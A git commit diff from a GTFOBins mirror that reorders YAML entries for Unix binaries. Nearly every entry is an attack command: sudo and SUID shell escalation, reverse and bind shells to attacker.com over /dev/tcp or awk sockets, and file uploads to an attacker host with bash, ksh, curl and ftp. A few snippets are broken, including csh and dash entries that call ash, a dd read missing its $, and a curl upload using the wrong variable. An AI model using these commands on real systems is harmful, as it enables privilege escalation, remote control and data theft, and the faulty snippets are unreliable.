mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Reorder functions in binaries
This commit is contained in:
parent
80b20b6991
commit
d6895f367d
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ash
|
||||
sudo-enabled:
|
||||
- code: sudo ash
|
||||
suid-enabled:
|
||||
- code: ./ash
|
||||
- code: ash
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./ash"
|
||||
sudo-enabled:
|
||||
- code: sudo ash
|
||||
---
|
||||
|
@ -1,34 +1,34 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
reverse-shell-non-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
|
||||
s = "/inet/tcp/0/" RHOST "/" RPORT;
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
|
||||
s = "/inet/tcp/0/" RHOST "/" RPORT;
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
bind-shell-non-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
awk -v LPORT=$LPORT 'BEGIN {
|
||||
s = "/inet/tcp/" LPORT "/0/0";
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
awk '//' "$LFILE"
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
awk -v LPORT=$LPORT 'BEGIN {
|
||||
s = "/inet/tcp/" LPORT "/0/0";
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
awk '//' "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo base64 "$LFILE" | base64 --decode
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./base64 "$LFILE" | base64 --decode
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
base64 "$LFILE" | base64 --decode
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
base64 "$LFILE" | base64 --decode
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./base64 "$LFILE" | base64 --decode
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo base64 "$LFILE" | base64 --decode
|
||||
---
|
||||
|
@ -1,52 +1,55 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: bash
|
||||
sudo-enabled:
|
||||
- code: sudo bash
|
||||
suid-enabled:
|
||||
- code: ./bash -p
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
- code: bash
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
||||
file-read:
|
||||
- description: It trims trailing newlines and it's not binary-safe.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
bash -c 'echo "$(<$LFILE)"'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP
|
||||
service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
|
||||
on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
bash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
bash -c 'echo data > $LFILE'
|
||||
file-read:
|
||||
- description: It trims trailing newlines and it's not binary-safe.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
bash -c 'echo "$(<$LFILE)"'
|
||||
suid-enabled:
|
||||
- code: "./bash -p"
|
||||
sudo-enabled:
|
||||
- code: sudo bash
|
||||
---
|
||||
|
@ -4,23 +4,24 @@ description: |
|
||||
what GTFBins binaries are supported. Here some example.
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: busybox sh
|
||||
sudo-enabled:
|
||||
- code: sudo busybox sh
|
||||
suid-enabled:
|
||||
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
|
||||
code: ./busybox sh
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./busybox cat "$LFILE"
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
busybox sh -c 'echo "data" > $LFILE'
|
||||
- code: busybox sh
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
busybox httpd -f -p $LPORT -h .
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
busybox httpd -f -p $LPORT -h .
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
busybox sh -c 'echo "data" > $LFILE'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./busybox cat "$LFILE"
|
||||
suid-enabled:
|
||||
- description: It may drop the SUID privileges depending on the compilation flags
|
||||
and the runtime configuration.
|
||||
code: "./busybox sh"
|
||||
sudo-enabled:
|
||||
- code: sudo busybox sh
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cat "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cat "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cat "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cat "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cat "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cat "$LFILE"
|
||||
---
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: csh
|
||||
sudo-enabled:
|
||||
- code: sudo csh
|
||||
suid-enabled:
|
||||
- code: ./csh -b
|
||||
- code: csh
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./csh -b"
|
||||
sudo-enabled:
|
||||
- code: sudo csh
|
||||
---
|
||||
|
@ -1,20 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
- description: Send local file with an HTTP POST request. Run an HTTP service on
|
||||
the attacker box to collect the file.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=file_to_save
|
||||
curl $URL -o $LFILE
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=file_to_save
|
||||
curl $URL -o $LFILE
|
||||
file-read:
|
||||
- description: The file path must be absolute.
|
||||
code: |
|
||||
LFILE=/tmp/file_to_read
|
||||
curl file://$LFILE
|
||||
- description: The file path must be absolute.
|
||||
code: |
|
||||
LFILE=/tmp/file_to_read
|
||||
curl file://$LFILE
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cut -d "" -f1 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cut -d "" -f1 "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cut -d "" -f1 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cut -d "" -f1 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cut -d "" -f1 "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cut -d "" -f1 "$LFILE"
|
||||
---
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: dash
|
||||
sudo-enabled:
|
||||
- code: sudo dash
|
||||
suid-enabled:
|
||||
- code: ./dash -p
|
||||
- code: dash
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./dash -p"
|
||||
sudo-enabled:
|
||||
- code: sudo dash
|
||||
---
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
dd if=LFILE
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | dd of=$LFILE
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | dd of=$LFILE
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
dd if=LFILE
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo diff --line-format=%L /dev/null $LFILE
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./diff --line-format=%L /dev/null $LFILE
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
diff --line-format=%L /dev/null $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
diff --line-format=%L /dev/null $LFILE
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./diff --line-format=%L /dev/null $LFILE
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo diff --line-format=%L /dev/null $LFILE
|
||||
---
|
||||
|
@ -1,22 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./ed
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: |
|
||||
ed file_to_read
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
file-write:
|
||||
- code: |
|
||||
ed file_to_write
|
||||
w
|
||||
- code: |
|
||||
ed file_to_write
|
||||
w
|
||||
file-read:
|
||||
- code: 'ed file_to_read
|
||||
|
||||
'
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./ed
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,16 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
file-read:
|
||||
- code: |
|
||||
emacs file_to_read
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
file-write:
|
||||
- code: |
|
||||
emacs file_to_write
|
||||
C-x C-s
|
||||
- code: |
|
||||
emacs file_to_write
|
||||
C-x C-s
|
||||
file-read:
|
||||
- code: 'emacs file_to_read
|
||||
|
||||
'
|
||||
suid-enabled:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
sudo-enabled:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: env /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo env /bin/sh
|
||||
- code: env /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./env /bin/sh -p
|
||||
- code: "./env /bin/sh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo env /bin/sh
|
||||
---
|
||||
|
@ -1,17 +1,18 @@
|
||||
---
|
||||
description: |
|
||||
The read file content is corrupted by replacing tabs with spaces.
|
||||
description: 'The read file content is corrupted by replacing tabs with spaces.
|
||||
|
||||
'
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo expand "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./expand "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
expand "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
expand "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./expand "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo expand "$LFILE"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
- code: "./expect -c 'spawn /bin/sh -p;interact'"
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
sudo-enabled:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
suid-enabled:
|
||||
- code: ./find . -exec /bin/sh -p \; -quit
|
||||
- code: "./find . -exec /bin/sh -p \\; -quit"
|
||||
sudo-enabled:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: flock -u / /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo flock -u / /bin/sh
|
||||
- code: flock -u / /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./flock -u / /bin/sh -p
|
||||
- code: "./flock -u / /bin/sh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo flock -u / /bin/sh
|
||||
---
|
||||
|
@ -1,17 +1,18 @@
|
||||
---
|
||||
description: |
|
||||
The read file content is not binary-safe.
|
||||
description: 'The read file content is not binary-safe.
|
||||
|
||||
'
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fold -w99999999 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fold -w99999999 "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fold -w99999999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fold -w99999999 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fold -w99999999 "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fold -w99999999 "$LFILE"
|
||||
---
|
||||
|
@ -1,23 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
upload:
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -7,11 +7,11 @@ description: |
|
||||
[version 3](/gtfobins/python3/).
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo head -c1G "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./head -c1G "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
head -c1G "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
head -c1G "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./head -c1G "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo head -c1G "$LFILE"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ionice /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo ionice /bin/sh
|
||||
- code: ionice /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./ionice /bin/sh -p
|
||||
- code: "./ionice /bin/sh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo ionice /bin/sh
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo jq -Rr . "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./jq -Rr . "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
jq -Rr . "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
jq -Rr . "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./jq -Rr . "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo jq -Rr . "$LFILE"
|
||||
---
|
||||
|
103
_gtfobins/ksh.md
103
_gtfobins/ksh.md
@ -1,56 +1,59 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ksh
|
||||
sudo-enabled:
|
||||
- code: sudo ksh
|
||||
suid-enabled:
|
||||
- code: ./ksh -p
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
- code: ksh
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
||||
file-read:
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c 'echo "$(<$LFILE)"'
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP
|
||||
service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
|
||||
on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
